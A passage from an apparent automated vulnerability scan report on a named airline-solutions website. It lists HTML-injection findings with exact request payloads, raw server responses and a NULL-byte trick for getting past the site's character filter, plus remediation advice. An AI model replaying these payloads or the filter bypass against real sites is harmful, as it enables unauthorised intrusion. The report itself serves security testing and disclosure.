Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321423; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:59:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321423; expires=Thu, 06-Oct-2011 09:59:50 GMT; path=/
Set-Cookie: exp_last_activity=1286377190; expires=Thu, 06-Oct-2011 09:59:50 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:00:10 GMT
Pragma: no-cache
Content-Length: 6781
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>5631a4947eb=1">?%007842c<a>5631a4947eb=1</a>
...[SNIP]...

3.65. http://www.sabreairlinesolutions.com/home/contact/media_relations [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/media_relations

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e0eb"><a>c644884f893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e0eb"><a>c644884f893 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/media_relations?%002e0eb"><a>c644884f893=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321488; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321488; expires=Thu, 06-Oct-2011 09:52:53 GMT; path=/
Set-Cookie: exp_last_activity=1286376773; expires=Thu, 06-Oct-2011 09:52:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:53:10 GMT
Pragma: no-cache
Content-Length: 6629
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/media_relations?%002e0eb"><a>c644884f893=1">
...[SNIP]...

3.66. http://www.sabreairlinesolutions.com/home/contact/media_relations [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/media_relations

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005296f<a>c26ff4d9c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5296f<a>c26ff4d9c0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/media_relations?%005296f<a>c26ff4d9c0=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321488; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:57:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321488; expires=Thu, 06-Oct-2011 09:57:12 GMT; path=/
Set-Cookie: exp_last_activity=1286377032; expires=Thu, 06-Oct-2011 09:57:12 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:57:28 GMT
Pragma: no-cache
Content-Length: 6623
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>c26ff4d9c0=1">media relations?%005296f<a>c26ff4d9c0=1</a>
...[SNIP]...

3.67. http://www.sabreairlinesolutions.com/home/contact/media_relations/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/media_relations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %008df90<a>37ff3b03616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8df90<a>37ff3b03616 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/media_relations/?%008df90<a>37ff3b03616=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321436; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:02:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321436; expires=Thu, 06-Oct-2011 10:02:10 GMT; path=/
Set-Cookie: exp_last_activity=1286377330; expires=Thu, 06-Oct-2011 10:02:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:02:23 GMT
Pragma: no-cache
Content-Length: 6676
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>37ff3b03616=1">?%008df90<a>37ff3b03616=1</a>
...[SNIP]...

3.68. http://www.sabreairlinesolutions.com/home/contact/media_relations/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/media_relations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ead24"><a>e7965e1db76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ead24"><a>e7965e1db76 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/media_relations/?%00ead24"><a>e7965e1db76=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321436; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:58:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321436; expires=Thu, 06-Oct-2011 09:58:42 GMT; path=/
Set-Cookie: exp_last_activity=1286377121; expires=Thu, 06-Oct-2011 09:58:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:58:59 GMT
Pragma: no-cache
Content-Length: 6680
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/media_relations/?%00ead24"><a>e7965e1db76=1">
...[SNIP]...

3.69. http://www.sabreairlinesolutions.com/home/contact/product_sales [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001ec7c"><a>3f7052a6597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1ec7c"><a>3f7052a6597 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_sales?%001ec7c"><a>3f7052a6597=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:03:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321496; expires=Thu, 06-Oct-2011 10:03:39 GMT; path=/
Set-Cookie: exp_last_activity=1286377419; expires=Thu, 06-Oct-2011 10:03:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:03:51 GMT
Pragma: no-cache
Content-Length: 6719
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/product_sales?%001ec7c"><a>3f7052a6597=1">
...[SNIP]...

3.70. http://www.sabreairlinesolutions.com/home/contact/product_sales [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_sales

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %006dd6e<a>c236508982f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6dd6e<a>c236508982f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_sales?%006dd6e<a>c236508982f=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:07:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321496; expires=Thu, 06-Oct-2011 10:07:26 GMT; path=/
Set-Cookie: exp_last_activity=1286377646; expires=Thu, 06-Oct-2011 10:07:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fabout%2Fexecutive_team%2Ftom_klein%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:07:38 GMT
Pragma: no-cache
Content-Length: 6715
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>c236508982f=1">product sales?%006dd6e<a>c236508982f=1</a>
...[SNIP]...

3.71. http://www.sabreairlinesolutions.com/home/contact/product_sales/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_sales/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0099963<a>2a2ea4d5865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99963<a>2a2ea4d5865 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_sales/?%0099963<a>2a2ea4d5865=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321412; expires=Thu, 06-Oct-2011 09:52:51 GMT; path=/
Set-Cookie: exp_last_activity=1286376770; expires=Thu, 06-Oct-2011 09:52:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:53:07 GMT
Pragma: no-cache
Content-Length: 6764
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>2a2ea4d5865=1">?%0099963<a>2a2ea4d5865=1</a>
...[SNIP]...

3.72. http://www.sabreairlinesolutions.com/home/contact/product_sales/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_sales/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0076d86"><a>d13558ba028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76d86"><a>d13558ba028 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_sales/?%0076d86"><a>d13558ba028=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:48:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321412; expires=Thu, 06-Oct-2011 09:48:53 GMT; path=/
Set-Cookie: exp_last_activity=1286376532; expires=Thu, 06-Oct-2011 09:48:53 GMT; path=/
